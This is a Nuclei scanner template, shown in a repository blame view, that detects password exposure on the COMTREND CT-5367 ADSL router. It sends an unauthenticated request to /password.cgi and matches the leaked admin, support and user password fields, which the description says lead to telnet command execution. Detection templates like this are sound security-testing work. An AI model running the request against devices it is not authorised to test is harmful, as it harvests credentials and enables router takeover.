nuclei-templates/vulnerabilities/other/comtrend-password-exposure....

28 lines
773 B
YAML
Raw Normal View History

2021-08-20 11:07:22 +00:00
id: comtrend-passsword-exposure
2021-08-19 09:17:44 +00:00
info:
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
author: geeknik
severity: high
2021-10-17 12:50:52 +00:00
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
2021-08-19 09:17:44 +00:00
reference: https://www.exploit-db.com/exploits/16275
2021-08-20 11:07:22 +00:00
tags: router,exposure,iot
2021-08-19 09:17:44 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/password.cgi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "pwdAdmin ="
- "pwdSupport ="
- "pwdUser ="
condition: and